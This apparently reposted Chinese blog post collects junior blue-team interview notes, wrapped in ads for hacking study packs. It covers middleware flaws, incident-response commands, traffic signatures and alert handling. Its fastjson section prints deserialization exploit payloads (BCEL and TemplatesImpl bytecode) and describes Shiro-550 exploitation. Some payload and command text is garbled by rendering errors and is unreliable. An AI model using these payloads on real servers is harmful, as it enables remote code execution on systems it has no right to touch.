网络安全最新hw蓝队初级面试总结

网络安全最新hw蓝队初级面试总结

码农世界 2024-05-31 前端 100 次浏览 0个评论

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客

1、网络安全理论知识(2天)

①了解行业相关背景,前景,确定发展方向。

②学习网络安全相关法律法规。

③网络安全运营的概念。

④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)

①渗透测试的流程、分类、标准

②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking

③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察

④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)

①Windows系统常见功能和命令

②Kali Linux系统常见功能和命令

③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)

①计算机网络基础、协议和架构

②网络通信原理、OSI模型、数据转发流程

③常见协议解析(HTTP、TCP/IP、ARP等)

④网络攻击技术与网络安全防御技术

⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)

①数据库基础

②SQL语言基础

③数据库安全加固

6、Web渗透(1周)

①HTML、CSS和JavaScript简介

②OWASP Top10

③Web漏洞扫描工具

④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!

7、脚本编程(初级/中级/高级)

在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

8、超级黑客

这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

漏洞扫描:

nessus,awvs ,appscan

漏洞验证:

是否存在漏洞,是否可以拿到webshell或者其他权限

权限提升:

windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权

linux内核漏洞提权、劫持高权限程序提权、sudoer配置文件错误提权

漏洞利用:

日志清理:

##### 6、中间件漏洞
iis:

远程代码执行

解析漏洞 目录以.asp结尾 xxx.asp;1.jpg

tomcat:

war包后门部署

远程代码执行

apache:

解析漏洞 1.php%0a换行解析 1.php.xxx 未知后缀解析

SSI远程命令执行

路径穿越

nginx:

解析漏洞 1.jpg/.php

目录穿越 (nginx配置别名的时候alias的时候,忘记加/ 将造成目录穿越漏洞)

CRLF注入 (Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞)

jboss:

反序列化

war后门部署

weblogic:

反序列化

ssrf任意文件上传

文件读取

##### 7、序列化反序列化及其流量特征

序列化:对象转换为字符串

反序列化:字符串转换为对象

流量特征:

shiro反序列化:查看cookie中rememberme字段,恶意命令要从这里传入。判断是否有漏洞,查看返回包set cookie:rememberme=deleteme,验证失败返回的标识符。

fastjson反序列化:请求报文中查找json格式的数据,重点看有无rmi或者出网的一些行为

st2-045:请求头中的Content-Type字段

##### 8、应急响应流程及windows/linux用到的命令

应急响应流程:

1、收集信息:搜集客户信息和中毒信息,备份

2、判断类型:判断是否是安全事件、是何种安全事件(勒索病毒、挖矿、断网、ddos等)

3、深入分析:日志分析、进程分析、启动项分析、样本分析

4、清理处置:杀掉恶意进程、删除恶意文件、打补丁、修复文件

5、产出报告:整理并输出完整的安全事件报告

windows应急

一、查看系统账号安全

1、查看服务器是否有弱口令、可疑账号、隐藏账号、克隆账号、远程管理端口是否对公网开放

2、win+r(eventwmr.msc)查看系统日志,查看管理员登录时间、用户名是否存在异常

二、检查异常端口、进程

1、netstat -ano 检查端口连接情况,是否有远程连接、可疑连接

2、tasklist | findstr "PID"根据pid定位进程

3、使用功能查杀工具

三、启动项检查、计划任务、服务

1、检查服务器是否有异常的启动项,msconfig看一下启动项是否有可以的启动

2、检查计划任务,查看计划任务属性,可以发现木马文件的路径

3、见擦汗服务自启动,services.msc注意服务状态和启动类型,检查是否有异常服务

四、检查系统相关信息

1、查看系统版本以及补丁信息 systeminfo

2、查找可以目录及文件 是否有新建用户目录 分析最近打开分析可疑文件(%UserProfile%\Recent)

五、自动化查杀

使用360 火绒剑 webshell后门可以使用d盾 河马等

六、日志分析

360星图日志分析工具 ELK分析平台

linux应急

1、检查用户及密码文件/etc/passwd、/etc/shadow 是否存在多余帐号,主要看一下帐号后面是否是 nologin,如果没有 nologin 就要注意;

2、通过 who 命令查看当前登录用户(tty 本地登陆 pts 远程登录)、w 命令查看系统信息,想知道某一时刻用户的行为、uptime查看登陆多久、多少用户,负载;

3、修改/etc/profile的文件,在尾部添加相应显示间、日期、ip、命令脚本代码,这样输入history命令就会详细显示攻击者 ip、时间历史命令等;

4、用 netstat -antlp|more命令分析可疑端口、IP、PID,查看下 pid 所对应的进程文件路径,运行ls -l /proc/ P I D / e x e 或 f i l e / p r o c / PID/exe 或 file /proc/ PID/exe或file/proc/PID/exe($PID 为对应的pid 号);

5、使用ps命令,分析进程 ps aux | grep pid

6、使用 vi /etc/inittab 查看系统当前运行级别,通过运行级别找到/etc/rc.d/rc[0~6].d对应目录是否存在可疑文件;

7、看一下crontab定时任务是否存在可疑启用脚本;

8、使用chkconfig --list 查看是否存在可疑服务;

9、通过grep awk命令分析/var/log/secure安全日志里面是否存在攻击痕迹;

10、chkrootkit、rkhunter、Clamav 病毒后门查杀工具对 Linux 系统文件查杀;

11、如果有 Web 站点,可通过 D 盾、河马查杀工具进行查杀或者手工对代码按脚本木马关键字、关键涵数(evel、system、shell_exec、exec、passthru system、popen)进行查杀Webshell 后门。

##### 9、流量分析

拿到流量包后将其导入wireshark中,使用过滤规则对流量包进行分析,常用的过滤规则有:

http contains “关键字”

http.response.code == 200

http.request.method == POST

tcp.prot == 80

ip.addr == “10.1.1.1”

ip.src

ip.dst

##### 10、Behinder流量特征

冰蝎是一款基于java开发的动态加密通信流量的新型webshell客户端,冰蝎的通信过程可以分为两个阶段:秘钥协商 加密传输

冰蝎2:ua头比较老,虽然内置了10余种,每次连接shell都会随机选择一个进行使用,由于比较老,容易被检测出来

content-length:16 #16是冰蝎2连接的特征

冰蝎3:冰蝎3取消了动态秘钥获取 accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征

ua头版本老:冰蝎3内置16个ua头都比较老,现实生活中使用较少。

##### 11、天眼基本搜索语法

sip:“10.1.1.1” AND dip:“10.1.1.2” AND status:(200)

#10.1.1.1访问服务器10.1.1.2状态码为200的流量日志

dport:“443” OR dport:"8080

#访问端口是443或者8080的流量日志

dport:“80” NOT host:“www.example.com”

#访问端口为80,排除访问www.example.com域名的流量日志

dip:“10.1.1.2” AND client_os:“windows7”

#服务器ip为10.1.1.2,操作系统为windows7的流量日志

处置方案:

传感器上出现sql注入告警后

1、验证此条sql注入告警是否真的存在sql注入漏洞

2、通过请求数据包判断触发告警的行为是客户自身还是攻击行为

3、若为自身业务问题,则将漏洞点相关整合成报告反馈客户

4若为攻击者行为,需要进一步分析,查看分析平台攻击ip除了sql注入外是否有其他攻击行为,攻击的结果如何

5、将发现时间及攻击行为反馈给护网客户

传感器上出现RCE告警

1、验证此条警告师傅真的成功(若成功直接出报告)

2、若失败,判断攻击者是手工还是工具批量扫描行为

3、进入分析平台进一步分析,查看分析平台攻击ip除了rce是否有其他攻击行为,攻击结果如何

4、将发现时间及攻击行为反馈给护网

##### 12、fastjson反序列化

fastjson1.2.24反序列化漏洞原理

1、fastjson提供的反序列化功能允许用户传入json格式数据局的时候通过@type的value值指定任意反序列化类名

2、fastjson的反序列化机制会将反序列的类进行实例化对象,并调用该对象的setter和部分getter方法

3、恶意用户可以构造payload是目标应用的代码执行流程进入这部分setter和getter方法,如果这些方法中存在Gadget,就会造成一些安全问题。

4、官方采取黑名单过滤的方法,对反序列化的类名进行校验,checkAutoType不断被绕过

fastjson利用流程:

使用@type的value字段执行反序列化的类,例如JdbcRowSetImpl这个类,接着将这个类中的成员变量datasourcename的value值设为rmi远程加载类,这样fastjson在将传入的类反序列化、实例对象后,会通过成员变量传入的value值,请求rmi服务器,最后rmi返回远程类,fastjson执行这个远程恶意类。导致rce漏洞。

fastjson反序列化的特征:

在请求包中查找json格式的字符串,重点在于rmi和一些出网操作

##### 13、fastjson不出网利用
1、基于BasicDataSource类

org.apache.tomcat.dbcp.dbcp2.BasicDataSource

条件:BasicDataSource需要有dbcp或者tomcat-dbcp的依赖

利用过程:使用BasicDataSource链,构造恶意类后将其的字节码转化为BCEL格式,其中driverClassName和driverClassLoader都是可控的,由用户输入,指定ClassLoader为com.sun.org.apache.bcel.internal.util.ClassLoader,设置ClassName为BCEL…这种格式,字啊newInstance方法执行后被实例化,第二个参数initial为true时,类加载后将会直接执行static{}块中的代码。

 

{

“@type”:“java.lang.Class”,

“val”:“com.sun.org.apache.bcel.internal.util.ClassLoader”

},

{

“@type”: “org.apache.tomcat.dbcp.dbcp.BasicDataSource”,

“driverClassLoader”: {“@type”: “com.sun.org.apache.bcel.internal.util.ClassLoader”},

“driverClassName”: “ B C E L BCEL BCEL$l 8 b 8b 8bI A A AA A A AA A A AA$A$7d 91 91 91cfN C 1 C1 C1Q c 6 c6 c6bf c 2 c2 c2KaTeX parse error: Can't use function '$' in math mode at position 3: c5$̲ba$C$o$e2$3fD$b…e$a8 91 91 91d4$j 83 83 83e8 G G Gd3$c8Qgnr 84 84 84d0$e8$83 84 c a 84ca 84caJ 82 82 82a3j$a1$82$3d 86 86 86ea f f l ffl fflL5 I I IGS d 73 d73 d73UKaTeX parse error: Expected group after '_' at position 4: 7ew_̲P c 6 c6 c6ca 89 89 89ffH b d Q bdQ bdQa4$e4 90 90 90$$d48O 5 e 5e 5en l F lF lFae l l leb$cez 91 t 91t 91tU e a ea eae0$f4 94 94 94c9H 81 81 81rm$90 5 d 5d 5da6$a8E$9e$917 9 b 9b 9b$603 9 d 9d 9db6 c 8 f c8f c8fb4H 97 97 97pk c d 7 cd7 cd7m$87 3 c 3c 3cf9 y y yK 3 f 3f 3fc57 g g gG e 4 K H e4KH e4KHbd c 2 x B c2xB c2xBf6 a 2 a2 a2f9 8 c 8c 8cccL 8 b 8b 8bZ 3 a 3a 3ac5DZ e 3 e3 e3caH f e fe fed0$m 8 d k U 8dkU 8dkUd0 w G wG wGa8o b c bc bca0 d c dc dcw 8 a 8a 8aU a d ad add1 e 4 H u 8 J e4Hu8J e4Hu8JG r r rd6uG e 5 e5 e5 H H HX v T vT vTR C C CA$A”}

 

import com.sun.org.apache.bcel.internal.util.ClassLoader;

import com.sun.org.apache.bcel.internal.classfile.JavaClass;

import com.sun.org.apache.bcel.internal.classfile.Utility;

import com.sun.org.apache.bcel.internal.Repository;

public class Test {

public static void main(String[] args) throws Exception {

JavaClass cls = Repository.lookupClass(Exp.class);

String code = Utility.encode(cls.getBytes(), true);

code = “ B C E L BCEL BCEL” + code;

new ClassLoader().loadClass(code).newInstance();

System.out.println(code);

}

}

2.基于com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类

条件:Feaure.SupportNonPublicField开启,默认是关闭状态

 

{“@type”:“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,“_bytecodes”:[“yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQAIUG9jLmphdmEMAAgACQcAIQwAIgAjAQAob3BlbiAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcAwAJAAlAQADUG9jAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAAAuAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAEACwAAAA4AAwAAAAsABAAMAA0ADQAMAAAABAABAA0AAQAOAA8AAQAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAABEAAQAOABAAAgAKAAAAGQAAAAMAAAABsQAAAAEACwAAAAYAAQAAABYADAAAAAQAAQARAAkAEgATAAIACgAAACUAAgACAAAACbsABVm3AAZMsQAAAAEACwAAAAoAAgAAABkACAAaAAwAAAAEAAEAFAABABUAAAACABY=”],‘_name’:‘a.b’,‘_tfactory’:{ },“_outputProperties”:{},“_name”:“a”,“_version”:“1.0”,“allowedProtocols”:“all”}

##### 14、shiro550反序列化

原理:

导致shiro反序列化的主要原因就是shiro提供的记住密码功能,当用户打开这个功能时会在请求阿包中生成一个cookie,cookie的value值是经过反序列->aes加密->base64加密后的字符串,关键在于aes加密的秘钥是默认的,如果没有修改这个秘钥,就会导致反序列化漏洞,攻击者可以构造恶意代码,将恶意代码序列化-aes加密-base64加密后传入cookie,这样就导致RCE漏洞。

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

2️⃣视频配套工具&国内外网安书籍、文档
① 工具
② 视频
③ 书籍

资源较为敏感,未展示全面,需要的最下面获取

② 简历模板

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

转载请注明来自码农世界,本文标题:《网络安全最新hw蓝队初级面试总结》

百度分享代码,如果开启HTTPS请参考李洋个人博客
每一天,每一秒,你所做的决定都会改变你的人生!

发表评论

快捷回复:

评论列表 (暂无评论,100人围观)参与讨论

还没有评论,来说两句吧...

Top